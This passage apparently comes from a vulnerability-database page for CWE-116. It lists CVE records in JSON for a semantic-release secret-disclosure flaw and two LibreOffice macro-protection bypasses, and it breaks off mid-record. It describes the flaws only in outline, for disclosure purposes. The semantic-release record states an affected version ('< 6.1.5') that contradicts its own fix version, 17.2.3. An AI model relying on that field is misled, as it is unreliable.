Common Weakness Enumeration

CWE-116

Allowed-with-Review

Improper Encoding or Escaping of Output

Abstraction: Class · Status: Draft

The product prepares a structured message for communication with another component, but encoding or escaping of the data is either missing or done incorrectly. As a result, the intended structure of the message is not preserved.

612 vulnerabilities reference this CWE, most recent first.

CVE-2020-26226 (GCVE-0-2020-26226)

Vulnerability from cvelistv5 – Published: 2020-11-18 21:35 – Updated: 2024-08-04 15:56
VLAI
Title
Secret disclosure in semantic-release
Summary
In the npm package semantic-release before version 17.2.3, secrets that would normally be masked by `semantic-release` can be accidentally disclosed if they contain characters that become encoded when included in a URL. Secrets that do not contain characters that become encoded when included in a URL are already masked properly. The issue is fixed in version 17.2.3.
CWE
  • CWE-116 - Improper Encoding or Escaping of Output
Assigner
References
Impacted products
Show details on NVD website

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-04T15:56:03.009Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://github.com/semantic-release/semantic-release/security/advisories/GHSA-r2j6-p67h-q639"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://github.com/semantic-release/semantic-release/commit/ca90b34c4a9333438cc4d69faeb43362bb991e5a"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "semantic-release",
          "vendor": "semantic-release",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c 6.1.5"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the npm package semantic-release before version 17.2.3, secrets that would normally be masked by `semantic-release` can be accidentally disclosed if they contain characters that become encoded when included in a URL. Secrets that do not contain characters that become encoded when included in a URL are already masked properly. The issue is fixed in version 17.2.3."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 8.1,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "REQUIRED",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-116",
              "description": "CWE-116: Improper Encoding or Escaping of Output",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2020-11-18T21:35:13.000Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/semantic-release/semantic-release/security/advisories/GHSA-r2j6-p67h-q639"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/semantic-release/semantic-release/commit/ca90b34c4a9333438cc4d69faeb43362bb991e5a"
        }
      ],
      "source": {
        "advisory": "GHSA-r2j6-p67h-q639",
        "discovery": "UNKNOWN"
      },
      "title": "Secret disclosure in semantic-release",
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "security-advisories@github.com",
          "ID": "CVE-2020-26226",
          "STATE": "PUBLIC",
          "TITLE": "Secret disclosure in semantic-release"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "semantic-release",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "\u003c 6.1.5"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "semantic-release"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "In the npm package semantic-release before version 17.2.3, secrets that would normally be masked by `semantic-release` can be accidentally disclosed if they contain characters that become encoded when included in a URL. Secrets that do not contain characters that become encoded when included in a URL are already masked properly. The issue is fixed in version 17.2.3."
            }
          ]
        },
        "impact": {
          "cvss": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 8.1,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "REQUIRED",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N",
            "version": "3.1"
          }
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "CWE-116: Improper Encoding or Escaping of Output"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://github.com/semantic-release/semantic-release/security/advisories/GHSA-r2j6-p67h-q639",
              "refsource": "CONFIRM",
              "url": "https://github.com/semantic-release/semantic-release/security/advisories/GHSA-r2j6-p67h-q639"
            },
            {
              "name": "https://github.com/semantic-release/semantic-release/commit/ca90b34c4a9333438cc4d69faeb43362bb991e5a",
              "refsource": "MISC",
              "url": "https://github.com/semantic-release/semantic-release/commit/ca90b34c4a9333438cc4d69faeb43362bb991e5a"
            }
          ]
        },
        "source": {
          "advisory": "GHSA-r2j6-p67h-q639",
          "discovery": "UNKNOWN"
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2020-26226",
    "datePublished": "2020-11-18T21:35:14.000Z",
    "dateReserved": "2020-10-01T00:00:00.000Z",
    "dateUpdated": "2024-08-04T15:56:03.009Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2019-9853 (GCVE-0-2019-9853)

Vulnerability from cvelistv5 – Published: 2019-09-27 15:07 – Updated: 2024-09-16 17:17
VLAI
Title
Insufficient URL decoding flaw in categorizing macro location
Summary
LibreOffice documents can contain macros. The execution of those macros is controlled by the document security settings, typically execution of macros are blocked by default. A URL decoding flaw existed in how the urls to the macros within the document were processed and categorized, resulting in the possibility to construct a document where macro execution bypassed the security settings. The documents were correctly detected as containing macros, and prompted the user to their existence within the documents, but macros within the document were subsequently not controlled by the security settings allowing arbitrary macro execution This issue affects: LibreOffice 6.2 series versions prior to 6.2.7; LibreOffice 6.3 series versions prior to 6.3.1.
Severity
No CVSS data available.
CWE
  • CWE-116 - Improper Encoding or Escaping of Output
Assigner
Impacted products
Vendor Product Version
Document Foundation LibreOffice Affected: 6.2 series , < 6.2.7 (custom)
Affected: 6.3 series , < 6.3.1 (custom)
Create a notification for this product.
Date Public
2019-09-27 00:00
Credits
Thanks to Nils Emmerich of ERNW Research GmbH for discovering and reporting this issue
Show details on NVD website

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-04T22:01:54.937Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://www.libreoffice.org/about-us/security/advisories/CVE-2019-9853/"
          },
          {
            "name": "[debian-lts-announce] 20191006 [SECURITY] [DLA 1947-1] libreoffice security update",
            "tags": [
              "mailing-list",
              "x_refsource_MLIST",
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2019/10/msg00005.html"
          },
          {
            "name": "FEDORA-2019-4b0cc75996",
            "tags": [
              "vendor-advisory",
              "x_refsource_FEDORA",
              "x_transferred"
            ],
            "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/KQGBRSD73KTDZ2MPAOL7FBWO3SQVYE5B/"
          },
          {
            "name": "[openoffice-commits] 20191016 svn commit: r1051583 - in /websites/staging/ooo-site/trunk: cgi-bin/ content/ content/security/cves/CVE-2019-9853.html",
            "tags": [
              "mailing-list",
              "x_refsource_MLIST",
              "x_transferred"
            ],
            "url": "https://lists.apache.org/thread.html/3a5570ca5cd14ad08e24684c71cfeff3a507f108fe3cf30ba4f58226%40%3Ccommits.openoffice.apache.org%3E"
          },
          {
            "name": "[openoffice-commits] 20191016 svn commit: r1868517 - /openoffice/ooo-site/trunk/content/security/cves/CVE-2019-9853.html",
            "tags": [
              "mailing-list",
              "x_refsource_MLIST",
              "x_transferred"
            ],
            "url": "https://lists.apache.org/thread.html/4ae0e6e52600f408d943ded079d314733ce188b04b04471464f89c4f%40%3Ccommits.openoffice.apache.org%3E"
          },
          {
            "name": "[openoffice-commits] 20191016 svn commit: r1868522 - /openoffice/ooo-site/trunk/content/security/bulletin.html",
            "tags": [
              "mailing-list",
              "x_refsource_MLIST",
              "x_transferred"
            ],
            "url": "https://lists.apache.org/thread.html/7394e6b5f78a878bd0c44e9bc9adf90b8cdf49e9adc0f287145aba9b%40%3Ccommits.openoffice.apache.org%3E"
          },
          {
            "name": "[openoffice-commits] 20191124 svn commit: r1870322 - /openoffice/ooo-site/trunk/content/security/cves/CVE-2019-9853.html",
            "tags": [
              "mailing-list",
              "x_refsource_MLIST",
              "x_transferred"
            ],
            "url": "https://lists.apache.org/thread.html/a540d1b6f9a7ebb206adba02839f654a6ee63a7b0976f559a847e49a%40%3Ccommits.openoffice.apache.org%3E"
          },
          {
            "name": "[openoffice-commits] 20191124 svn commit: r1053264 - in /websites/staging/ooo-site/trunk: cgi-bin/ content/ content/security/cves/CVE-2019-9853.html",
            "tags": [
              "mailing-list",
              "x_refsource_MLIST",
              "x_transferred"
            ],
            "url": "https://lists.apache.org/thread.html/a5231ad45b030b54828c7b0b62a7e7d4b48481c7cb83ff628e07fa43%40%3Ccommits.openoffice.apache.org%3E"
          },
          {
            "name": "[openoffice-commits] 20191124 svn commit: r1053267 - in /websites/staging/ooo-site/trunk: cgi-bin/ content/ content/security/cves/CVE-2019-9853.html",
            "tags": [
              "mailing-list",
              "x_refsource_MLIST",
              "x_transferred"
            ],
            "url": "https://lists.apache.org/thread.html/9dc85d9937ad7f101047c53f78c00e8ceb135eaeff7dcf4724b46f2c%40%3Ccommits.openoffice.apache.org%3E"
          },
          {
            "name": "[openoffice-commits] 20191124 svn commit: r1870324 - /openoffice/ooo-site/trunk/content/security/cves/CVE-2019-9853.html",
            "tags": [
              "mailing-list",
              "x_refsource_MLIST",
              "x_transferred"
            ],
            "url": "https://lists.apache.org/thread.html/70da9481dca267405e1d79e53942264765ef3f55c9a563c3737e3926%40%3Ccommits.openoffice.apache.org%3E"
          },
          {
            "name": "[openoffice-commits] 20191124 svn commit: r1870337 - in /openoffice/ooo-site/trunk/content/security/cves: CVE-2019-9853.html CVE-XXXX-YYYY.html",
            "tags": [
              "mailing-list",
              "x_refsource_MLIST",
              "x_transferred"
            ],
            "url": "https://lists.apache.org/thread.html/ca216900abd846f0220fe18b95f9f787bdbe0e87fa4eee822073cd69%40%3Ccommits.openoffice.apache.org%3E"
          },
          {
            "name": "[openoffice-commits] 20191124 svn commit: r1053270 - in /websites/staging/ooo-site/trunk: cgi-bin/ content/ content/security/cves/CVE-2019-9853.html content/security/cves/CVE-XXXX-YYYY.html",
            "tags": [
              "mailing-list",
              "x_refsource_MLIST",
              "x_transferred"
            ],
            "url": "https://lists.apache.org/thread.html/27339e8a9a1e9bb47fbdb939b338256d0356250a1974aaf4d774f683%40%3Ccommits.openoffice.apache.org%3E"
          },
          {
            "name": "[openoffice-commits] 20191124 svn commit: r1053271 - in /websites/staging/ooo-site/trunk: cgi-bin/ content/ content/security/cves/CVE-2019-9853.html content/security/cves/CVE-XXXX-YYYY.html",
            "tags": [
              "mailing-list",
              "x_refsource_MLIST",
              "x_transferred"
            ],
            "url": "https://lists.apache.org/thread.html/19c917f7c8a0d8f62142046fabfe3e2c7d6091ef1f92b99c6e79e24e%40%3Ccommits.openoffice.apache.org%3E"
          },
          {
            "name": "[openoffice-commits] 20191124 svn commit: r1870336 - in /openoffice/ooo-site/trunk/content/security/cves: CVE-2019-9853.html CVE-XXXX-YYYY.html",
            "tags": [
              "mailing-list",
              "x_refsource_MLIST",
              "x_transferred"
            ],
            "url": "https://lists.apache.org/thread.html/306a374361891eb17c6cffc99c3d7be1d3152a99c839d4231edc1631%40%3Ccommits.openoffice.apache.org%3E"
          },
          {
            "name": "openSUSE-SU-2019:2709",
            "tags": [
              "vendor-advisory",
              "x_refsource_SUSE",
              "x_transferred"
            ],
            "url": "http://lists.opensuse.org/opensuse-security-announce/2019-12/msg00040.html"
          },
          {
            "name": "20200220 Open-Xchange Security Advisory 2020-02-19",
            "tags": [
              "mailing-list",
              "x_refsource_FULLDISC",
              "x_transferred"
            ],
            "url": "http://seclists.org/fulldisclosure/2020/Feb/23"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "http://packetstormsecurity.com/files/156474/Open-Xchange-App-Suite-Documents-Server-Side-Request-Forgery.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "LibreOffice",
          "vendor": "Document Foundation",
          "versions": [
            {
              "lessThan": "6.2.7",
              "status": "affected",
              "version": "6.2 series",
              "versionType": "custom"
            },
            {
              "lessThan": "6.3.1",
              "status": "affected",
              "version": "6.3 series",
              "versionType": "custom"
            }
          ]
        }
      ],
      "credits": [
        {
          "lang": "en",
          "value": "Thanks to Nils Emmerich of ERNW Research GmbH for discovering and reporting this issue"
        }
      ],
      "datePublic": "2019-09-27T00:00:00.000Z",
      "descriptions": [
        {
          "lang": "en",
          "value": "LibreOffice documents can contain macros. The execution of those macros is controlled by the document security settings, typically execution of macros are blocked by default. A URL decoding flaw existed in how the urls to the macros within the document were processed and categorized, resulting in the possibility to construct a document where macro execution bypassed the security settings. The documents were correctly detected as containing macros, and prompted the user to their existence within the documents, but macros within the document were subsequently not controlled by the security settings allowing arbitrary macro execution This issue affects: LibreOffice 6.2 series versions prior to 6.2.7; LibreOffice 6.3 series versions prior to 6.3.1."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-116",
              "description": "CWE-116 Improper Encoding or Escaping of Output",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2020-02-21T17:06:02.000Z",
        "orgId": "4fe7d05b-1353-44cc-8b7a-1e416936dff2",
        "shortName": "Document Fdn."
      },
      "references": [
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://www.libreoffice.org/about-us/security/advisories/CVE-2019-9853/"
        },
        {
          "name": "[debian-lts-announce] 20191006 [SECURITY] [DLA 1947-1] libreoffice security update",
          "tags": [
            "mailing-list",
            "x_refsource_MLIST"
          ],
          "url": "https://lists.debian.org/debian-lts-announce/2019/10/msg00005.html"
        },
        {
          "name": "FEDORA-2019-4b0cc75996",
          "tags": [
            "vendor-advisory",
            "x_refsource_FEDORA"
          ],
          "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/KQGBRSD73KTDZ2MPAOL7FBWO3SQVYE5B/"
        },
        {
          "name": "[openoffice-commits] 20191016 svn commit: r1051583 - in /websites/staging/ooo-site/trunk: cgi-bin/ content/ content/security/cves/CVE-2019-9853.html",
          "tags": [
            "mailing-list",
            "x_refsource_MLIST"
          ],
          "url": "https://lists.apache.org/thread.html/3a5570ca5cd14ad08e24684c71cfeff3a507f108fe3cf30ba4f58226%40%3Ccommits.openoffice.apache.org%3E"
        },
        {
          "name": "[openoffice-commits] 20191016 svn commit: r1868517 - /openoffice/ooo-site/trunk/content/security/cves/CVE-2019-9853.html",
          "tags": [
            "mailing-list",
            "x_refsource_MLIST"
          ],
          "url": "https://lists.apache.org/thread.html/4ae0e6e52600f408d943ded079d314733ce188b04b04471464f89c4f%40%3Ccommits.openoffice.apache.org%3E"
        },
        {
          "name": "[openoffice-commits] 20191016 svn commit: r1868522 - /openoffice/ooo-site/trunk/content/security/bulletin.html",
          "tags": [
            "mailing-list",
            "x_refsource_MLIST"
          ],
          "url": "https://lists.apache.org/thread.html/7394e6b5f78a878bd0c44e9bc9adf90b8cdf49e9adc0f287145aba9b%40%3Ccommits.openoffice.apache.org%3E"
        },
        {
          "name": "[openoffice-commits] 20191124 svn commit: r1870322 - /openoffice/ooo-site/trunk/content/security/cves/CVE-2019-9853.html",
          "tags": [
            "mailing-list",
            "x_refsource_MLIST"
          ],
          "url": "https://lists.apache.org/thread.html/a540d1b6f9a7ebb206adba02839f654a6ee63a7b0976f559a847e49a%40%3Ccommits.openoffice.apache.org%3E"
        },
        {
          "name": "[openoffice-commits] 20191124 svn commit: r1053264 - in /websites/staging/ooo-site/trunk: cgi-bin/ content/ content/security/cves/CVE-2019-9853.html",
          "tags": [
            "mailing-list",
            "x_refsource_MLIST"
          ],
          "url": "https://lists.apache.org/thread.html/a5231ad45b030b54828c7b0b62a7e7d4b48481c7cb83ff628e07fa43%40%3Ccommits.openoffice.apache.org%3E"
        },
        {
          "name": "[openoffice-commits] 20191124 svn commit: r1053267 - in /websites/staging/ooo-site/trunk: cgi-bin/ content/ content/security/cves/CVE-2019-9853.html",
          "tags": [
            "mailing-list",
            "x_refsource_MLIST"
          ],
          "url": "https://lists.apache.org/thread.html/9dc85d9937ad7f101047c53f78c00e8ceb135eaeff7dcf4724b46f2c%40%3Ccommits.openoffice.apache.org%3E"
        },
        {
          "name": "[openoffice-commits] 20191124 svn commit: r1870324 - /openoffice/ooo-site/trunk/content/security/cves/CVE-2019-9853.html",
          "tags": [
            "mailing-list",
            "x_refsource_MLIST"
          ],
          "url": "https://lists.apache.org/thread.html/70da9481dca267405e1d79e53942264765ef3f55c9a563c3737e3926%40%3Ccommits.openoffice.apache.org%3E"
        },
        {
          "name": "[openoffice-commits] 20191124 svn commit: r1870337 - in /openoffice/ooo-site/trunk/content/security/cves: CVE-2019-9853.html CVE-XXXX-YYYY.html",
          "tags": [
            "mailing-list",
            "x_refsource_MLIST"
          ],
          "url": "https://lists.apache.org/thread.html/ca216900abd846f0220fe18b95f9f787bdbe0e87fa4eee822073cd69%40%3Ccommits.openoffice.apache.org%3E"
        },
        {
          "name": "[openoffice-commits] 20191124 svn commit: r1053270 - in /websites/staging/ooo-site/trunk: cgi-bin/ content/ content/security/cves/CVE-2019-9853.html content/security/cves/CVE-XXXX-YYYY.html",
          "tags": [
            "mailing-list",
            "x_refsource_MLIST"
          ],
          "url": "https://lists.apache.org/thread.html/27339e8a9a1e9bb47fbdb939b338256d0356250a1974aaf4d774f683%40%3Ccommits.openoffice.apache.org%3E"
        },
        {
          "name": "[openoffice-commits] 20191124 svn commit: r1053271 - in /websites/staging/ooo-site/trunk: cgi-bin/ content/ content/security/cves/CVE-2019-9853.html content/security/cves/CVE-XXXX-YYYY.html",
          "tags": [
            "mailing-list",
            "x_refsource_MLIST"
          ],
          "url": "https://lists.apache.org/thread.html/19c917f7c8a0d8f62142046fabfe3e2c7d6091ef1f92b99c6e79e24e%40%3Ccommits.openoffice.apache.org%3E"
        },
        {
          "name": "[openoffice-commits] 20191124 svn commit: r1870336 - in /openoffice/ooo-site/trunk/content/security/cves: CVE-2019-9853.html CVE-XXXX-YYYY.html",
          "tags": [
            "mailing-list",
            "x_refsource_MLIST"
          ],
          "url": "https://lists.apache.org/thread.html/306a374361891eb17c6cffc99c3d7be1d3152a99c839d4231edc1631%40%3Ccommits.openoffice.apache.org%3E"
        },
        {
          "name": "openSUSE-SU-2019:2709",
          "tags": [
            "vendor-advisory",
            "x_refsource_SUSE"
          ],
          "url": "http://lists.opensuse.org/opensuse-security-announce/2019-12/msg00040.html"
        },
        {
          "name": "20200220 Open-Xchange Security Advisory 2020-02-19",
          "tags": [
            "mailing-list",
            "x_refsource_FULLDISC"
          ],
          "url": "http://seclists.org/fulldisclosure/2020/Feb/23"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "http://packetstormsecurity.com/files/156474/Open-Xchange-App-Suite-Documents-Server-Side-Request-Forgery.html"
        }
      ],
      "source": {
        "discovery": "EXTERNAL"
      },
      "title": "Insufficient URL decoding flaw in categorizing macro location",
      "x_generator": {
        "engine": "Vulnogram 0.0.8"
      },
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "security@documentfoundation.org",
          "DATE_PUBLIC": "2019-09-27T00:00:00.000Z",
          "ID": "CVE-2019-9853",
          "STATE": "PUBLIC",
          "TITLE": "Insufficient URL decoding flaw in categorizing macro location"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "LibreOffice",
                      "version": {
                        "version_data": [
                          {
                            "version_affected": "\u003c",
                            "version_name": "6.2 series",
                            "version_value": "6.2.7"
                          },
                          {
                            "version_affected": "\u003c",
                            "version_name": "6.3 series",
                            "version_value": "6.3.1"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "Document Foundation"
              }
            ]
          }
        },
        "credit": [
          {
            "lang": "eng",
            "value": "Thanks to Nils Emmerich of ERNW Research GmbH for discovering and reporting this issue"
          }
        ],
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "LibreOffice documents can contain macros. The execution of those macros is controlled by the document security settings, typically execution of macros are blocked by default. A URL decoding flaw existed in how the urls to the macros within the document were processed and categorized, resulting in the possibility to construct a document where macro execution bypassed the security settings. The documents were correctly detected as containing macros, and prompted the user to their existence within the documents, but macros within the document were subsequently not controlled by the security settings allowing arbitrary macro execution This issue affects: LibreOffice 6.2 series versions prior to 6.2.7; LibreOffice 6.3 series versions prior to 6.3.1."
            }
          ]
        },
        "generator": {
          "engine": "Vulnogram 0.0.8"
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "CWE-116 Improper Encoding or Escaping of Output"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://www.libreoffice.org/about-us/security/advisories/CVE-2019-9853/",
              "refsource": "CONFIRM",
              "url": "https://www.libreoffice.org/about-us/security/advisories/CVE-2019-9853/"
            },
            {
              "name": "[debian-lts-announce] 20191006 [SECURITY] [DLA 1947-1] libreoffice security update",
              "refsource": "MLIST",
              "url": "https://lists.debian.org/debian-lts-announce/2019/10/msg00005.html"
            },
            {
              "name": "FEDORA-2019-4b0cc75996",
              "refsource": "FEDORA",
              "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KQGBRSD73KTDZ2MPAOL7FBWO3SQVYE5B/"
            },
            {
              "name": "[openoffice-commits] 20191016 svn commit: r1051583 - in /websites/staging/ooo-site/trunk: cgi-bin/ content/ content/security/cves/CVE-2019-9853.html",
              "refsource": "MLIST",
              "url": "https://lists.apache.org/thread.html/3a5570ca5cd14ad08e24684c71cfeff3a507f108fe3cf30ba4f58226@%3Ccommits.openoffice.apache.org%3E"
            },
            {
              "name": "[openoffice-commits] 20191016 svn commit: r1868517 - /openoffice/ooo-site/trunk/content/security/cves/CVE-2019-9853.html",
              "refsource": "MLIST",
              "url": "https://lists.apache.org/thread.html/4ae0e6e52600f408d943ded079d314733ce188b04b04471464f89c4f@%3Ccommits.openoffice.apache.org%3E"
            },
            {
              "name": "[openoffice-commits] 20191016 svn commit: r1868522 - /openoffice/ooo-site/trunk/content/security/bulletin.html",
              "refsource": "MLIST",
              "url": "https://lists.apache.org/thread.html/7394e6b5f78a878bd0c44e9bc9adf90b8cdf49e9adc0f287145aba9b@%3Ccommits.openoffice.apache.org%3E"
            },
            {
              "name": "[openoffice-commits] 20191124 svn commit: r1870322 - /openoffice/ooo-site/trunk/content/security/cves/CVE-2019-9853.html",
              "refsource": "MLIST",
              "url": "https://lists.apache.org/thread.html/a540d1b6f9a7ebb206adba02839f654a6ee63a7b0976f559a847e49a@%3Ccommits.openoffice.apache.org%3E"
            },
            {
              "name": "[openoffice-commits] 20191124 svn commit: r1053264 - in /websites/staging/ooo-site/trunk: cgi-bin/ content/ content/security/cves/CVE-2019-9853.html",
              "refsource": "MLIST",
              "url": "https://lists.apache.org/thread.html/a5231ad45b030b54828c7b0b62a7e7d4b48481c7cb83ff628e07fa43@%3Ccommits.openoffice.apache.org%3E"
            },
            {
              "name": "[openoffice-commits] 20191124 svn commit: r1053267 - in /websites/staging/ooo-site/trunk: cgi-bin/ content/ content/security/cves/CVE-2019-9853.html",
              "refsource": "MLIST",
              "url": "https://lists.apache.org/thread.html/9dc85d9937ad7f101047c53f78c00e8ceb135eaeff7dcf4724b46f2c@%3Ccommits.openoffice.apache.org%3E"
            },
            {
              "name": "[openoffice-commits] 20191124 svn commit: r1870324 - /openoffice/ooo-site/trunk/content/security/cves/CVE-2019-9853.html",
              "refsource": "MLIST",
              "url": "https://lists.apache.org/thread.html/70da9481dca267405e1d79e53942264765ef3f55c9a563c3737e3926@%3Ccommits.openoffice.apache.org%3E"
            },
            {
              "name": "[openoffice-commits] 20191124 svn commit: r1870337 - in /openoffice/ooo-site/trunk/content/security/cves: CVE-2019-9853.html CVE-XXXX-YYYY.html",
              "refsource": "MLIST",
              "url": "https://lists.apache.org/thread.html/ca216900abd846f0220fe18b95f9f787bdbe0e87fa4eee822073cd69@%3Ccommits.openoffice.apache.org%3E"
            },
            {
              "name": "[openoffice-commits] 20191124 svn commit: r1053270 - in /websites/staging/ooo-site/trunk: cgi-bin/ content/ content/security/cves/CVE-2019-9853.html content/security/cves/CVE-XXXX-YYYY.html",
              "refsource": "MLIST",
              "url": "https://lists.apache.org/thread.html/27339e8a9a1e9bb47fbdb939b338256d0356250a1974aaf4d774f683@%3Ccommits.openoffice.apache.org%3E"
            },
            {
              "name": "[openoffice-commits] 20191124 svn commit: r1053271 - in /websites/staging/ooo-site/trunk: cgi-bin/ content/ content/security/cves/CVE-2019-9853.html content/security/cves/CVE-XXXX-YYYY.html",
              "refsource": "MLIST",
              "url": "https://lists.apache.org/thread.html/19c917f7c8a0d8f62142046fabfe3e2c7d6091ef1f92b99c6e79e24e@%3Ccommits.openoffice.apache.org%3E"
            },
            {
              "name": "[openoffice-commits] 20191124 svn commit: r1870336 - in /openoffice/ooo-site/trunk/content/security/cves: CVE-2019-9853.html CVE-XXXX-YYYY.html",
              "refsource": "MLIST",
              "url": "https://lists.apache.org/thread.html/306a374361891eb17c6cffc99c3d7be1d3152a99c839d4231edc1631@%3Ccommits.openoffice.apache.org%3E"
            },
            {
              "name": "openSUSE-SU-2019:2709",
              "refsource": "SUSE",
              "url": "http://lists.opensuse.org/opensuse-security-announce/2019-12/msg00040.html"
            },
            {
              "name": "20200220 Open-Xchange Security Advisory 2020-02-19",
              "refsource": "FULLDISC",
              "url": "http://seclists.org/fulldisclosure/2020/Feb/23"
            },
            {
              "name": "http://packetstormsecurity.com/files/156474/Open-Xchange-App-Suite-Documents-Server-Side-Request-Forgery.html",
              "refsource": "MISC",
              "url": "http://packetstormsecurity.com/files/156474/Open-Xchange-App-Suite-Documents-Server-Side-Request-Forgery.html"
            }
          ]
        },
        "source": {
          "discovery": "EXTERNAL"
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "4fe7d05b-1353-44cc-8b7a-1e416936dff2",
    "assignerShortName": "Document Fdn.",
    "cveId": "CVE-2019-9853",
    "datePublished": "2019-09-27T15:07:40.492Z",
    "dateReserved": "2019-03-17T00:00:00.000Z",
    "dateUpdated": "2024-09-16T17:17:42.379Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2019-9852 (GCVE-0-2019-9852)

Vulnerability from cvelistv5 – Published: 2019-08-15 21:40 – Updated: 2024-09-17 03:42
VLAI
Title
Insufficient URL encoding flaw in allowed script location check
Summary
LibreOffice has a feature where documents can specify that pre-installed macros can be executed on various script events such as mouse-over, document-open etc. Access is intended to be restricted to scripts under the share/Scripts/python, user/Scripts/python sub-directories of the LibreOffice install. Protection was added, to address CVE-2018-16858, to avoid a directory traversal attack where scripts in arbitrary locations on the file system could be executed. However this new protection could be bypassed by a URL encoding attack. In the fixed versions, the parsed url describing the script location is correctly encoded before further processing. This issue affects: Document Foundation LibreOffice versions prior to 6.2.6.
Severity
No CVSS data available.
CWE
  • CWE-116 - Improper Encoding or Escaping of Output
Assigner
References
URL Tags
https://www.libreoffice.org/about-us/security/adv… x_refsource_MISC
https://seclists.org/bugtraq/2019/Aug/28 mailing-listx_refsource_BUGTRAQ
https://www.debian.org/security/2019/dsa-4501 vendor-advisoryx_refsource_DEBIAN
https://lists.fedoraproject.org/archives/list/pac… vendor-advisoryx_refsource_FEDORA
https://usn.ubuntu.com/4102-1/ vendor-advisoryx_refsource_UBUNTU
http://lists.opensuse.org/opensuse-security-annou… vendor-advisoryx_refsource_SUSE
https://seclists.org/bugtraq/2019/Sep/17 mailing-listx_refsource_BUGTRAQ
http://lists.opensuse.org/opensuse-security-annou… vendor-advisoryx_refsource_SUSE
https://lists.debian.org/debian-lts-announce/2019… mailing-listx_refsource_MLIST
Impacted products
Vendor Product Version
Document Foundation LibreOffice Affected: unspecified , < 6.2.6 (custom)
Create a notification for this product.
Date Public
2019-08-15 00:00
Credits
Thanks to Nils Emmerich of ERNW Research GmbH for discovering and reporting this issue
Show details on NVD website

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-04T22:01:54.996Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
